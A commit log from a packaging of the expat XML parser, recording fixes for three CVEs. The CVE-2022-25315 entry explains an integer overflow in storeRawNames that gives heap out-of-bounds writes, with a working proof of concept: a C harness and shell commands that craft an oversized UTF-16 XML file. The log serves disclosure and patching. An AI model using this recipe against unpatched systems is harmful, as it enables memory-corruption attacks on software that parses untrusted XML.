[CVE-2021-45960] lib: Detect and prevent troublesome left shifts in function storeAtts (CVE-2021-45960)
Change-Id: Ia2074e6b6ff8a17db2548cf402817aa60c551d4c
[CVE-2022-25315] Prevent integer overflow in storeRawNames
It is possible to use an integer overflow in storeRawNames for out of
boundary heap writes. Default configuration is affected. If compiled
with XML_UNICODE then the attack does not work. Compiling with
-fsanitize=address confirms the following proof of concept.
The problem can be exploited by abusing the m_buffer expansion logic.
Even though the initial size of m_buffer is a power of two, eventually
it can end up a little bit lower, thus allowing allocations very close
to INT_MAX (since INT_MAX/2 can be surpassed). This means that tag
names can be parsed which are almost INT_MAX in size.
Unfortunately (from an attacker point of view) INT_MAX/2 is also a
limitation in string pools. Having a tag name of INT_MAX/2 characters
or more is not possible.
Expat can convert between different encodings. UTF-16 documents which
contain only ASCII representable characters are twice as large as their
ASCII encoded counter-parts.
The proof of concept works by taking these three considerations into
account:
1. Move the m_buffer size slightly below a power of two by having a
short root node <a>. This allows the m_buffer to grow very close
to INT_MAX.
2. The string pooling forbids tag names longer than or equal to
INT_MAX/2, so keep the attack tag name smaller than that.
3. To be able to still overflow INT_MAX even though the name is
limited at INT_MAX/2-1 (nul byte) we use UTF-16 encoding and a tag
which only contains ASCII characters. UTF-16 always stores two
bytes per character while the tag name is converted to using only
one. Our attack node byte count must be a bit higher than
2/3 INT_MAX so the converted tag name is around INT_MAX/3 which
in sum can overflow INT_MAX.
Thanks to our small root node, m_buffer can handle 2/3 INT_MAX bytes
without running into INT_MAX boundary check. The string pooling is
able to store INT_MAX/3 as tag name because the amount is below
INT_MAX/2 limitation. And creating the sum of both eventually overflows
in storeRawNames.
Proof of Concept:
1. Compile expat with -fsanitize=address.
2. Create Proof of Concept binary which iterates through input
file 16 MB at once for better performance and easier integer
calculations:
```
cat > poc.c << EOF
#include <err.h>
#include <expat.h>
#include <stdlib.h>
#include <stdio.h>
#define CHUNK (16 * 1024 * 1024)
int main(int argc, char *argv[]) {
XML_Parser parser;
FILE *fp;
char *buf;
int i;
if (argc != 2)
errx(1, "usage: poc file.xml");
if ((parser = XML_ParserCreate(NULL)) == NULL)
errx(1, "failed to create expat parser");
if ((fp = fopen(argv[1], "r")) == NULL) {
XML_ParserFree(parser);
err(1, "failed to open file");
}
if ((buf = malloc(CHUNK)) == NULL) {
fclose(fp);
XML_ParserFree(parser);
err(1, "failed to allocate buffer");
}
i = 0;
while (fread(buf, CHUNK, 1, fp) == 1) {
printf("iteration %d: XML_Parse returns %d\n", ++i,
XML_Parse(parser, buf, CHUNK, XML_FALSE));
}
free(buf);
fclose(fp);
XML_ParserFree(parser);
return 0;
}
EOF
gcc -fsanitize=address -lexpat -o poc poc.c
```
3. Construct specially prepared UTF-16 XML file:
```
dd if=/dev/zero bs=1024 count=794624 | tr '\0' 'a' > poc-utf8.xml
echo -n '<a><' | dd conv=notrunc of=poc-utf8.xml
echo -n '><' | dd conv=notrunc of=poc-utf8.xml bs=1 seek=
805306368
iconv -f UTF-8 -t UTF-16LE poc-utf8.xml > poc-utf16.xml
```
4. Run proof of concept:
```
./poc poc-utf16.xml
```
Change-Id: I814c068538ee37bee414f477eb2dc13cc643e27c
[CVE-2022-25236]lib: Protect against insertion of namesep characters into namespace URIs
lib: Protect against malicious namespace declarations
lib: Fix (harmless) use of uninitialized memory
Change-Id: Ic1d24c7d23683b7894f8cfb2628ed7af95f2300c
Merge branch 'tizen_base' of ssh://review.tizen.org:29418/platform/upstream/expat into tizen_base
Change-Id: I72e0b08c3adb36d5a932785e90c5b212be8778e2
Signed-off-by: Hyunjee Kim <hj0426.kim@samsung.com>